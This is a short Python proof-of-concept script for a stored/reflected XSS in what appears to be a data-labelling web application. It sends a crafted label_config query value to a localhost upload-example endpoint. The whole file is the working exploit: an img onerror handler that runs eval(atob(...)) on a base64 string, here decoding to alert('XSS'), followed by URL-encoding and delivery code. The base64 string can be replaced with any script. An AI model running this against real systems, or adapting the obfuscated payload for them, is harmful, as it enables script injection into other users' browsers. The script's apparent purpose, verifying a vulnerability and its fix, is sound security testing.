import requests
import urllib.parse
from termcolor import colored
# Endpoint under test (a local instance on port 8080).
url = "http://localhost:8080/projects/upload-example/"

# Label config used as the test input, assembled piece by piece:
#   * a <View> root element,
#   * an HTML comment carrying JSON sample data whose "text" field holds the
#     markup being tested,
#   * a <HyperText> element whose value="$text" refers to that field
#     (presumably rendered as HTML by the application; confirm against the
#     target's documentation).
# The base64 string decodes to alert("XSS"), the marker the browser shows if
# the markup is rendered without sanitisation.
payload = (
    '<View>'
    '<!-- {"data": {"text": "<div><img src=x onerror=eval(atob(`YWxlcnQoIlhTUyIp`))></div>"}} -->'
    '<HyperText name="text" value="$text"/>'
    '</View>'
)

# Percent-encode the config so it can be placed in a query string; "/" is the
# only reserved character left unescaped (the default for quote()).
encoded_payload = urllib.parse.quote(payload, safe="/")
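def exploit_xss():
    """Request the upload-example page with the crafted ``label_config`` value.

    Builds the request URL from the module-level ``url`` and
    ``encoded_payload`` values, sends a single GET request and prints a
    coloured status line. Returns ``None``; failures are reported on stdout
    rather than raised.

    An HTTP 200 only shows that the server answered the request. It does not
    show that the markup was rendered unescaped, so the printed URL still has
    to be opened in a browser to confirm the finding. Repeating the same check
    after a fix is deployed verifies that the input is now neutralised.
    """
    print(colored("[*] Attempting to send XSS payload...", "cyan"))
    try:
        # The value is already percent-encoded, so it is appended to the query
        # string as-is. The timeout keeps the script from blocking forever
        # when the host accepts the connection but never answers.
        response = requests.get(url + f"?label_config={encoded_payload}", timeout=10)
    except Exception as e:
        # Deliberately broad: this is the script's reporting boundary and the
        # error is always shown to the operator, never swallowed.
        print(colored(f"[-] An error occurred: {e}", "red"))
    else:
        if response.status_code == 200:
            print(colored("[+] Payload successfully sent!", "green"))
            print(colored(f"[+] Check this URL in a browser: {response.url}", "yellow"))
        else:
            print(colored(f"[-] Failed to send payload. HTTP Status Code: {response.status_code}", "red"))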
if __name__ == "__main__":
    # Run the check only when executed as a script, not when imported.
    exploit_xss()